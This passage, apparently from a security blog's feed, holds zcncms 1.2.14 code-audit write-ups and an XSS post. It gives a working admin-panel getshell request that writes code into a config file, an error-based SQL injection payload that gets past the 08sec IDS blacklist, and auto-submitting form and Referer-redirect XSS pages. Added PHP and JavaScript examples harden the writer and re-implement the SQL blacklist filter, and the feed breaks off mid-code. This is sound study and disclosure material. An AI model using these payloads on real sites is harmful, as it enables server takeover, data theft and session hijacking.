class="string">"'"</span>,<span class="string">'"'</span>,<span class="string">"\t"</span>);</span><br><span class="line"> $new = <span class="keyword">array</span>(<span class="string">"&"</span>,<span class="string">" "</span>,<span class="string">"&#39;"</span>,<span class="string">"&quot;"</span>,<span class="string">"&nbsp; &nbsp; "</span>);</span><br><span class="line"> $msg = str_replace($old,$new,$msg);</span><br><span class="line"> $msg = str_replace(<span class="string">" "</span>,<span class="string">"&nbsp; &nbsp;"</span>,$msg);</span><br><span class="line"> $old = <span class="keyword">array</span>(<span class="string">"/<script(.*)<\/script>/isU"</span>,<span class="string">"/<frame(.*)>/isU"</span>,<span class="string">"/<\/fram(.*)>/isU"</span>,<span class="string">"/<iframe(.*)>/isU"</span>,<span class="string">"/<\/ifram(.*)>/isU"</span>,<span class="string">"/<style(.*)<\/style>/isU"</span>);</span><br><span class="line"> $new = <span class="keyword">array</span>(<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>);</span><br><span class="line"> $msg = preg_replace($old,$new,$msg);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $msg;</span><br></pre></td></tr></table></figure></p>
<p>The safe function filters single and double quotes and the common XSS patterns. Now look at sys.inc.php:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$sys[<span class="string">"isclose"</span>] = <span class="string">'0'</span>;</span><br><span class="line">$sys[<span class="string">"closeinfo"</span>] = <span class="string">'comming soon'</span>;</span><br><span class="line">$sys[<span class="string">"webtitle"</span>] = <span class="string">'ZCNCMS'</span>;</span><br><span class="line">$sys[<span class="string">"indextitle"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webkeywords"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webdescription"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webcopyright"</span>] = <span class="string">'Copyright+©+1996-2012,+All+Rights+Reserved+ZCNCMS'</span>;</span><br><span class="line">$sys[<span class="string">"webbeian"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"systemplates"</span>] = <span class="string">'default'</span>;</span><br><span class="line">$sys[<span class="string">"linkurlmode"</span>] = <span class="string">'0'</span>;</span><br><span class="line"></span><br><span class="line"> <span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>Continuing into the write function used by sys.php, <code>file_Write()->_write()</code>:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">// write the content</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">_write</span><span class="params">($content,$file,$type=<span class="string">"wb"</span>)</span></span><br><span class="line"> </span>{</span><br><span class="line"> <span class="keyword">global</span> $system_time;</span><br><span class="line"> $content = stripslashes($content);</span><br><span class="line"> $handle = $this->_open($file,$type);</span><br><span class="line"> @fwrite($handle,$content);</span><br><span class="line"> <span class="keyword">unset</span>($content);</span><br><span class="line"> $this->close($handle);</span><br><span class="line"> <span class="comment">// set the file creation time</span></span><br><span class="line"> $system_time = $system_time ? $system_time : time();</span><br><span class="line"> @touch($file,$system_time);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure></p>
<p>So after the whole series of sanitisation steps, stripslashes is applied right before writing, while single quotes were already replaced earlier. This is where <code>\</code> comes in.<br>The request can be constructed like this:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=sys</span><br><span class="line">POST:</span><br><span class="line">isclose=0&closeinfo=1\&webtitle=;phpinfo();//&indextitle=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webkeywords=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webdescription=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webbeian=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webcopyright=Copyright+%C2%A9+1996-2012%2C+All+Rights+Reserved+ZCNCMS&linkurlmode=0&systemplates=default&submit=%E7%BC%96%E8%BE%91</span><br></pre></td></tr></table></figure></p>
<p>The single quote that closes $sys["closeinfo"] is escaped, so the string literal instead ends at the first single quote of $sys["webtitle"]; the value of $sys["webtitle"] thereby ends up outside any quotes, the trailing single quote is commented out with "//", and code can be written directly in between. After the request, sys.inc.php looks like this:<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2aPrCuXXXXXbtXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<p>Getshell succeeded.</p>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2iFDQuXXXXXXyXpXXXXXXXXXX_!!792076116.png" alt=""></p>
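<p>The following is an added example, not zcncms code: the writer shape that sys.php ends up with (values dropped between single quotes after stripslashes()) next to a writer built on var_export(), with a tokenizer-based lint that flags a generated sys.inc.php containing anything but plain assignments; the sample values are constructed.</p>

```php
<?php
// Added example, not zcncms code: the writer shape that sys.php ends up with
// (values dropped between single quotes after stripslashes()) next to a writer
// built on var_export(), and a token-level check that flags generated config
// containing anything but plain assignments.
declare(strict_types=1);

// Reconstruction of the vulnerable shape, following the sys.inc.php layout above.
// $sys values are as registered by zcncms, i.e. already passed through addslashes().
function renderNaive(array $sys): string
{
    $out = "<?php\n";
    foreach ($sys as $k => $v) {
        $out .= '$sys["' . $k . '"] = \'' . stripslashes((string) $v) . "';\n";
    }
    return $out . "?>";
}

// Hardened writer: var_export() emits a valid PHP literal for any string,
// escaping backslashes and quotes itself, so no value can end its own literal.
function renderSafe(array $sys): string
{
    $out = "<?php\n";
    foreach ($sys as $k => $v) {
        if (!preg_match('/^[a-z]+$/', (string) $k)) {
            throw new InvalidArgumentException("unexpected config key: $k");
        }
        $raw  = stripslashes((string) $v);
        $out .= '$sys[' . var_export($k, true) . '] = ' . var_export($raw, true) . ";\n";
    }
    return $out;
}

// Lint for generated config: only open/close tags, $sys[...] = '...'; and
// whitespace are expected. Any other token means data has turned into code.
function onlyAssignments(string $php): bool
{
    $allowedIds = [T_OPEN_TAG, T_CLOSE_TAG, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING, T_WHITESPACE];
    foreach (token_get_all($php) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowedIds, true)) {
                return false;
            }
        } elseif (!in_array($tok, ['[', ']', '=', ';'], true)) {
            return false;
        }
    }
    return true;
}

// Write the rendered file, include it back and return the $sys array it defines.
function roundTrip(string $php): array
{
    $file = tempnam(sys_get_temp_dir(), 'sysinc');
    file_put_contents($file, $php);
    $sys = [];
    include $file;
    unlink($file);
    return $sys;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed values with the troublesome shape from the post: one value ends
// in a backslash, the next one begins with a statement separator.
$submitted  = ['isclose' => '0', 'closeinfo' => 'maintenance\\', 'webtitle' => ';echo "injected";//'];
$registered = array_map('addslashes', $submitted);   // what _GetRequest() hands the controller

check(!onlyAssignments(renderNaive($registered)), 'naive writer lets data become code');
check(onlyAssignments(renderSafe($registered)), 'var_export writer yields assignments only');
check(roundTrip(renderSafe($registered)) === $submitted, 'values round-trip unchanged');
echo "all checks passed\n";
```

The naive output is only tokenized, never included, so the check runs without executing the broken file.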
]]></content>
<summary type="html">
<p>Following the previous post <a href="http://wps2015.org/2016/08/05/code%20audit%20of%20zcncms/">Code audit: zcncms backend SQL injection (I)</a>, this one continues to dig out several more zcncms vulnerabilities.
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>Code audit: zcncms backend SQL injection (I)</title>
<link href="http://wps2015.org/2016/08/05/code-audit-of-zcncms1/"/>
<id>http://wps2015.org/2016/08/05/code-audit-of-zcncms1/</id>
<published>2016-08-04T16:00:00.000Z</published>
<updated>2016-08-09T07:58:31.439Z</updated>
<content type="html"><![CDATA[<p>Since this is a backend injection it is of limited practical use, but I am posting it for reference and shared learning. The zcncms version is 1.2.14; official website:<br><a href="http://www.zcncms.com/" target="_blank" rel="external">zcncms</a><a id="more"></a></p>
<h4 id="0x01-变量处理"><a href="#0x01-变量处理" class="headerlink" title="0x01 变量处理"></a>0x01 Variable handling</h4><p>In the file /include/common.inc.php:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">// check and register externally submitted variables</span></span><br><span class="line"><span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $_k=>$_v)</span><br><span class="line">{</span><br><span class="line"> <span class="comment">//if( strlen($_k)>0 && eregi('^(GLOBALS)',$_k) )</span></span><br><span class="line"> <span class="keyword">if</span>( strlen($_k)><span class="number">0</span> && preg_match(<span class="string">'/^(GLOBALS)/i'</span>,$_k) )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">exit</span>(<span class="string">'Request var not allow!'</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">-------------------------------------------------------------------</span><br><span class="line"><span class="comment">//foreach(Array('_GET','_POST','_COOKIE') as $_request) automatic variable creation from cookies removed</span></span><br><span class="line"><span class="keyword">foreach</span>(<span class="keyword">Array</span>(<span class="string">'_GET'</span>,<span class="string">'_POST'</span>) <span class="keyword">as</span> $_request)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">foreach</span>($$_request <span class="keyword">as</span> $_k => $_v) {</span><br><span class="line"> <span class="comment">//------------------20130128 validate variable names</span></span><br><span class="line"> <span class="keyword">if</span>(strstr($_k, <span class="string">'_'</span>) == $_k){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'code:re_all'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// consider adding variable checks to reduce variable overwriting</span></span><br><span class="line"> <span class="comment">//--------------------------</span></span><br><span class="line"> ${$_k} = _GetRequest($_v);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Keys of the form "_p" and "GLOBALS p" are filtered out to prevent overwriting of global variables, and <code>_GetRequest()</code> applies addslashes to every value. With that understood, the exploitable points become fairly clear.</p>
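<p>The following is an added example, not zcncms code: what the registration loop above does to a constructed request, next to a registration that only materialises parameters the controller has declared (the declaration spec is an assumption), so that an undeclared $topTitle, as used in the reflected XSS of part two, can no longer be set.</p>

```php
<?php
// Added example, not zcncms code: the effect of the ${$_k} = ... registration
// loop quoted above, and a replacement that only materialises parameters the
// controller has declared. The spec below is an assumption for the demo.
declare(strict_types=1);

// Reconstruction of the original loop's effect on one request array: every key
// becomes a variable unless it begins with '_' (the 20130128 check).
function registerAll(array $request): array
{
    $vars = [];
    foreach ($request as $k => $v) {
        if (strstr((string) $k, '_') == (string) $k) {
            throw new RuntimeException('code:re_all');
        }
        $vars[$k] = addslashes((string) $v);   // _GetRequest() applies addslashes()
    }
    return $vars;
}

// Coerce one raw value to the declared type; null means "not accepted".
function coerce(string $type, string $raw)
{
    if ($type === 'int') {
        return preg_match('/^[0-9]+$/', $raw) ? (int) $raw : null;
    }
    if (strncmp($type, 'enum:', 5) === 0) {
        return in_array($raw, explode(',', substr($type, 5)), true) ? $raw : null;
    }
    throw new InvalidArgumentException("unknown type: $type");
}

// Hardened registration: the controller declares name => type; everything else
// in the request is ignored, so undeclared template variables cannot be set.
function registerDeclared(array $request, array $spec): array
{
    $vars = [];
    foreach ($spec as $name => $type) {
        if (!isset($request[$name]) || !is_string($request[$name])) {
            continue;
        }
        $value = coerce($type, $request[$name]);
        if ($value !== null) {
            $vars[$name] = $value;
        }
    }
    return $vars;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed request: a legitimate controller name plus two unwanted extras.
$request = [
    'c'         => 'login',
    'id'        => '7',
    'productid' => '12 or 1=1',
    'topTitle'  => '</title><b>injected</b>',
];
$spec = [
    'c'         => 'enum:login,products_photo,sys',
    'a'         => 'enum:list,edit',
    'id'        => 'int',
    'productid' => 'int',
];

$all = registerAll($request);
check(isset($all['topTitle']), 'original loop registers undeclared topTitle');
check($all['productid'] === '12 or 1=1', 'addslashes() leaves a quote-free value untouched');

$declared = registerDeclared($request, $spec);
check(!isset($declared['topTitle']), 'undeclared name is dropped');
check($declared['id'] === 7, 'declared int is coerced');
check(!isset($declared['productid']), 'non-numeric productid is rejected');
check(!isset($declared['a']), 'absent parameter stays unset');
echo "all checks passed\n";
```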
<h4 id="0x02-未正确过滤"><a href="#0x02-未正确过滤" class="headerlink" title="0x02 未正确过滤"></a>0x02 Improper filtering</h4><p>File /module/menus/admincontroller/menus.php:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">'edit'</span>:<span class="comment">//</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $info = <span class="keyword">array</span>();</span><br><span class="line"> $time = time();</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($id)){</span><br><span class="line"> $id = intval($id);</span><br><span class="line"> <span class="keyword">if</span>($id <= <span class="number">0</span>){</span><br><span class="line"> errorinfo(<span class="string">'变量错误'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> $infoold = $menus->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$id);</span><br><span class="line"> <span class="comment">// check whether the category's parent changed</span></span><br><span class="line"> <span class="keyword">if</span>($parentid != $infoold[<span class="string">'parentid'</span>]) { <span class="comment">// meaningless comparison</span></span><br><span class="line"> $List = $menus->GetList(<span class="string">''</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="string">" parentid = $id "</span>,<span class="string">''</span>); <span class="comment">// proper id</span></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">empty</span>($List)) {</span><br><span class="line"> errorinfo(<span class="string">'对不起,该导航('</span>.$id.<span class="string">')下有子导航'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// resolve the root category</span></span><br><span class="line"> <span class="keyword">if</span>($parentid == <span class="number">0</span>) {</span><br><span class="line"> $rootid = <span class="number">0</span>;</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $parent = $menus->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$parentid); <span class="comment">// no single quotes</span></span><br></pre></td></tr></table></figure></p>
<p>The comparison $parentid != $infoold['parentid'] uses '!=', so once we control the value of $parentid the inequality obviously holds. But errorinfo makes the program exit, so a parentid that does not exist in the database is needed here, so that $List comes back empty and execution reaches the SQL operation below:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$parent = $menus->GetInfo('',' id = '.$parentid);</span><br></pre></td></tr></table></figure></p>
<h4 id="0x03-全局过滤(08sec-ids)"><a href="#0x03-全局过滤(08sec-ids)" class="headerlink" title="0x03 全局过滤(08sec ids)"></a>0x03 Global filtering (08sec ids)</h4><p>While trying this out, it turned out that SQL execution has a filter of its own:</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2wu4nuXXXXXXfXXXXXXXXXXXX_!!792076116.png" alt="test"><br>Tracing the SQL execution path: GetInfo() -> Execute() -> option() -> SafeSql()<br><figure class="highlight php"><pre><code>function SafeSql($db_string,$querytype='select'){
    //var_dump($db_string);
    // Check the complete SQL statement
    //$pos = '';
    //$old_pos = '';
    $pos = 0;
    $old_pos = 0;
    $clean = '';
    if(empty($db_string)){
        return false;
    }
    // Replace every single-quoted string literal with the token $s$, so that
    // keywords inside literals are not inspected by the checks below
    while (true){
        $pos = strpos($db_string, '\'', $pos + 1);
        if ($pos === false)
        {
            break;
        }
        $clean .= substr($db_string, $old_pos, $pos - $old_pos);
        while (true)
        {
            $pos1 = strpos($db_string, '\'', $pos + 1);
            $pos2 = strpos($db_string, '\\', $pos + 1);
            if ($pos1 === false)
            {
                break;
            }
            elseif ($pos2 == false || $pos2 > $pos1)
            {
                $pos = $pos1;
                break;
            }
            $pos = $pos2 + 1;
        }
        $clean .= '$s$';
        $old_pos = $pos + 1;
    }
    $clean .= substr($db_string, $old_pos);
    $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));

    // Old versions of MySQL do not support UNION and ordinary programs do not use it,
    // but attackers do, so check for it
    if (strpos($clean, 'union') !== false && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
    {
        $fail = true;
        $error="union detect";
    }

    // Released programs rarely contain comments such as -- or #, but attackers use them often
    elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== false || strpos($clean, '#') !== false)
    {
        $fail = true;
        $error="comment detect";
    }

    // These functions are not used by the application, but attackers use them to
    // manipulate files or bring the database down
    elseif (strpos($clean, 'sleep') !== false && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
    {
        $fail = true;
        $error="slown down detect";
    }
    elseif (strpos($clean, 'benchmark') !== false && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)
    {
        $fail = true;
        $error="slown down detect";
    }
    elseif (strpos($clean, 'load_file') !== false && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0)
    {
        $fail = true;
        $error="file fun detect";
    }
    elseif (strpos($clean, 'into outfile') !== false && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0)
    {
        $fail = true;
        $error="file fun detect";
    }

    // Old versions of MySQL do not support subqueries and our programs rarely use them,
    // but attackers can use them to read sensitive data from the database
    elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
    {
        $fail = true;
        $error="sub select detect";
    }
    if (!empty($fail))
    {
        //fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");
        exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");
    }
    else
    {
        return $db_string;
    }
}
?></code></pre></figure></p>
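<p>To see exactly how the filter reaches a verdict, here is a JavaScript re-implementation of the SafeSql() logic above, added for this page and not code from zcncms or 08sec. It mirrors the two steps of the original: first every single-quoted string literal is masked to the token $s$ (honouring backslash escapes), then the ordered blacklist checks run over the masked, lower-cased query. Instead of calling exit() it returns the masked query together with the verdict, using the original error strings (including the "slown down" spelling) so results can be compared with the PHP.</p>

```javascript
// Added example: JavaScript port of the SafeSql() filter shown above, written
// for this page to study the filter's behaviour. Returns { clean, verdict }
// instead of terminating the request.

// Step 1: replace every single-quoted literal with the token $s$.
// As in the PHP, the search for the opening quote starts at offset 1.
function maskStringLiterals(dbString) {
  let pos = 0;
  let oldPos = 0;
  let clean = '';
  for (;;) {
    pos = dbString.indexOf("'", pos + 1);
    if (pos === -1) break;
    clean += dbString.substring(oldPos, pos);
    for (;;) {
      const pos1 = dbString.indexOf("'", pos + 1);   // next quote
      const pos2 = dbString.indexOf('\\', pos + 1);  // next backslash
      if (pos1 === -1) break;                        // unterminated literal
      if (pos2 === -1 || pos2 > pos1) { pos = pos1; break; } // closing quote found
      pos = pos2 + 1;                                // skip the escaped character
    }
    clean += '$s$';
    oldPos = pos + 1;
  }
  clean += dbString.substring(oldPos);
  // Collapse whitespace, lower-case and trim, as preg_replace/strtolower/trim do.
  return clean.replace(/\s+/g, ' ').toLowerCase().trim();
}

// A keyword counts only when it is not part of a longer identifier
// (same regex shape as the PHP: (^|[^a-z])word($|[^[a-z]) ).
function bareWord(clean, word) {
  return clean.indexOf(word) !== -1 &&
    new RegExp('(^|[^a-z])' + word + '($|[^[a-z])').test(clean);
}

// Step 2: the ordered blacklist checks. Only the first matching rule fires.
function safeSql(dbString) {
  if (!dbString) return { clean: '', verdict: 'empty' };
  const clean = maskStringLiterals(dbString);
  let verdict = 'ok';
  if (bareWord(clean, 'union')) {
    verdict = 'union detect';
  } else if (clean.indexOf('/*') > 2 || clean.indexOf('--') !== -1 || clean.indexOf('#') !== -1) {
    verdict = 'comment detect';
  } else if (bareWord(clean, 'sleep') || bareWord(clean, 'benchmark')) {
    verdict = 'slown down detect';          // sic: the original message text
  } else if (bareWord(clean, 'load_file')) {
    verdict = 'file fun detect';
  } else if (clean.indexOf('into outfile') !== -1 &&
             /(^|[^a-z])into\s+outfile($|[^[a-z])/.test(clean)) {
    verdict = 'file fun detect';
  } else if (/\([^)]*?select/.test(clean)) {
    verdict = 'sub select detect';
  }
  return { clean, verdict };
}
```

Running safeSql() over a few constructed queries shows the design: a keyword inside a quoted literal is invisible to the checks because it has been masked, while the same keyword outside a literal is blocked. This is the essence of a blacklist IDS, and it is why the decision rests entirely on how faithfully the masking step agrees with the database's own tokeniser.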
<p>From the code and the warning message this is clearly the generic 08sec IDS; dedecms and other projects bundle the same snippet. Many bypasses for it have been published online.<br>Constructed payload:<br><figure class="highlight plain"><pre><code>zcncms/admin/?c=products_class&a=edit&id=1
POST:
submit=&parentid=12=@`\\\'` and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1));#@`\\\'`</code></pre></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB27vUOtVXXXXaOXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<h4 id="0x04-多处类似处理不当"><a href="#0x04-多处类似处理不当" class="headerlink" title="0x04 Similar mishandling in several places"></a>0x04 Similar mishandling in several places</h4><p>Searching the code shows that parentid is mishandled in several other places, though all of them require back-end (admin) privileges.</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2vro2tVXXXXXRXpXXXXXXXXXX_!!792076116.png" alt=""></p>
]]></content>
<summary type="html">
<p>Since this is a back-end injection it is of limited use; I am posting it for reference and mutual study. zcncms version 1.2.14, official site:<br><a href="http://www.zcncms.com/">zcncms</a></p>
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>LNScan: an efficient information-probing script</title>
<link href="http://wps2015.org/2016/07/28/LNScan/"/>
<id>http://wps2015.org/2016/07/28/LNScan/</id>
<published>2016-07-27T16:00:00.000Z</published>
<updated>2016-11-09T03:45:11.125Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>For security practitioners, quickly learning what an IP range, IP list or domain list exposes (ports, page titles, sensitive files and so on) is an important step in a security assessment. LNScan was built for exactly this; its sensitive-file scanning module is adapted from <a href="https://github.com/lijiejie/BBScan" target="_blank" rel="external">BBScan</a>.</p>
<a id="more"></a>
<h3 id="特点"><a href="#特点" class="headerlink" title="Features"></a>Features</h3><ul>
<li><p>Fast and efficient: combines multiple processes with multiple threads</p>
</li>
<li><p>Supports a specified IP range, or import from a file (IPs/domains)</p>
</li>
<li><p>Sensitive-file scanning supports multiple web ports</p>
</li>
<li><p>Generates a clearly formatted HTML report when the scan finishes, for easy review</p>
</li>
</ul>
<p>The scan report looks like this:</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2SbKbtFXXXXaeXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<h3 id="流程"><a href="#流程" class="headerlink" title="Workflow"></a>Workflow</h3><figure class="highlight plain"><pre><code>IP range/file => title & common-port scan => extract web ports => sensitive-file scan => generate report</code></pre></figure>
<h3 id="改进"><a href="#改进" class="headerlink" title="Improvements"></a>Improvements</h3><p>For a large enterprise, the IPs/domains obtained by enumerating subdomains with tools such as Layer are incomplete; and if many subdomains turn out to be spread across different class C ranges, scanning every C range becomes a heavy task. This tool plans to expand the imported IPs/domains deliberately (adjacent IPs before and after, or splitting into smaller subnets by mask) so as to hit as many of the target enterprise's IPs as possible.</p>
<hr>
<p><strong>Latest progress</strong></p>
<ol>
<li>IP expansion is done: the <code>"--extend num"</code> option expands each IP within a specified small subnet, e.g. <code>"--extend 30"</code>; it is mainly intended for input imported with the <code>-f</code> file option;</li>
</ol>
<h3 id="地址"><a href="#地址" class="headerlink" title="Address"></a>Address</h3><p><a href="https://github.com/sowish/LNScan" target="_blank" rel="external">LNScan repository</a></p>
]]></content>
<summary type="html">
<h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>For security practitioners, quickly learning what an IP range, IP list or domain list exposes (ports, page titles, sensitive files and so on) is an important step in a security assessment. LNScan was built for exactly this; its sensitive-file scanning module is adapted from <a href="https://github.com/lijiejie/BBScan">BBScan</a>.</p>
</summary>
<category term="神器而已" scheme="http://wps2015.org/categories/%E7%A5%9E%E5%99%A8%E8%80%8C%E5%B7%B2/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>Exploring unusual XSS exploitation</title>
<link href="http://wps2015.org/2016/06/27/unusual-xss/"/>
<id>http://wps2015.org/2016/06/27/unusual-xss/</id>
<published>2016-06-26T16:00:00.000Z</published>
<updated>2016-07-08T02:02:56.260Z</updated>
<content type="html"><![CDATA[<h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 Preface"></a>0x01 Preface</h3><p>Compared with persistent XSS, reflected XSS is rather weak: the user has to be tricked into clicking a crafted link in order to steal cookies or, going further, to hijack the user's actions via CSRF. If it is a GET-based XSS, the JavaScript sits directly in the URL; a little odd-looking, but it at least works on whoever takes the bait.<a id="more"></a> If, however, the JavaScript has to travel in a POST body or in a header, it becomes even weaker and may be unexploitable. I read a lot of material and made the attempts below.</p>
<h3 id="0x02-POST型反射xss"><a href="#0x02-POST型反射xss" class="headerlink" title="0x02 POST-based reflected XSS"></a>0x02 POST-based reflected XSS</h3><p>For POST reflected XSS there is already a mature exploitation approach: build a POST form and submit it directly with JavaScript. The form is built as follows:<br><figure class="highlight html"><pre><code><html>
<body>
<form name="form" id="form1" method="post" action="http://target.com/test.php">
<input type="text" name="searchKey" hidden="true" value='test"><img src=1 onerror=alert(document.domain)>'/>
</form>
<script>
document.getElementById('form1').submit();
</script>
</body>
</html></code></pre></figure></p>
<p>Save the HTML and lure the victim into opening the file; it fires as follows:<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2e_kZrVXXXXabXpXXXXXXXXXX_!!792076116.png" alt="post"></p>
<h3 id="0x03-http头部反射xss"><a href="#0x03-http头部反射xss" class="headerlink" title="0x03 Reflected XSS in HTTP headers"></a>0x03 Reflected XSS in HTTP headers</h3><p>If the XSS input point is in an HTTP header, the form-submission approach no longer works. The asynchronous cross-origin AJAX approach is discussed later; first, a rather special header: <code>referer</code>.</p>
<h4 id="referer头信息xss"><a href="#referer头信息xss" class="headerlink" title="Referer header XSS"></a>Referer header XSS</h4><p>When the browser navigates, it normally places the previous page's URL in the Referer header. If we control the URL before the navigation and make it navigate to the target page, a Referer XSS becomes exploitable. Chrome and Firefox URL-encode characters such as "<>" in the pre-navigation URL, but IE does not, so this method works under IE. The vulnerable page:<br><figure class="highlight php"><pre><code><?php
echo 123;
echo $_SERVER['HTTP_REFERER'];
?></code></pre></figure></p>
<p>It simply echoes the Referer, so build a redirect:<br><figure class="highlight html"><pre><code><html>
<script>
window.location.href="http://target.com/xss_test/referer.php";
</script>
</html></code></pre></figure></p>
<p>Visit <code>http://localhost:8088/test/header/referer_location.html?<script>alert(document.domain) </script></code>. Tested successfully on <code>IE11</code>.</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2QcVdsXXXXXcuXXXXXXXXXXXX_!!792076116.png" alt="xss"></p>
<p>Besides a window.location redirect, an iframe, a form submission and similar techniques also work. Using an <code>iframe</code> tag:<br><figure class="highlight html"><pre><code><html>
<iframe src="http://target.com/xss_test/referer.php">
</html></code></pre></figure></p>
<p>Using <code>form submission</code>:<br><figure class="highlight html"><pre><code><html>
  <body>
    <form id="xss"
          name="xss"
          method="GET"
          action="http://target.com/xss_test/referer.php">
    </form>
    <script>
      document.getElementById("xss").submit();
    </script>
  </body>
</html></code></pre></figure></p>
<h4 id="对其他header的xss尝试"><a href="#对其他header的xss尝试" class="headerlink" title="XSS attempts on other headers"></a>XSS attempts on other headers</h4><p>How can we make the victim, after clicking a link, visit the vulnerable page with a specific header attached? AJAX can do this. Because a cross-origin request is needed, I followed the CORS (Cross-Origin Resource Sharing) model. CORS requires the server to send certain response headers, so the attack scenario here is narrow and this is purely an academic exercise. The headers the server can set are:<br><figure class="highlight plain"><pre><code>Access-Control-Allow-Origin: the origins allowed to make cross-origin requests; a list of origins or the wildcard "*". Note that the origin rule applies to the host only, not to subdirectories: http://foo.example/subdir/ is invalid. Different subdomains must be configured separately; see the same-origin policy article for the rules
Access-Control-Allow-Credentials: whether requests may carry credentials; explained in detail below
Access-Control-Expose-Headers: response headers that scripts may read; after a successful request the script can read them from the XMLHttpRequest (WebKit apparently has not implemented this)
Access-Control-Max-Age: how many seconds to cache this response. Within that time, requests of the same kind skip the preflight and use the cached headers as the basis for the decision; very useful, greatly reducing the number of requests
Access-Control-Allow-Methods: permitted request methods, comma-separated
Access-Control-Allow-Headers: permitted custom headers, comma-separated, case-insensitive</code></pre></figure></p>
<p>Under the CORS model, AJAX requests from the browser fall into simple and non-simple cross-origin requests. A simple cross-origin request is sent without the server's permission, but the browser blocks access to the response. The vulnerable server-side page (the header is read from <code>HTTP_X_FORWARDED_FOR</code>, the key PHP uses for a request header):<br><figure class="highlight php"><pre><code><?php
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Headers: X-Forwarded-For, referer, Content-Type");
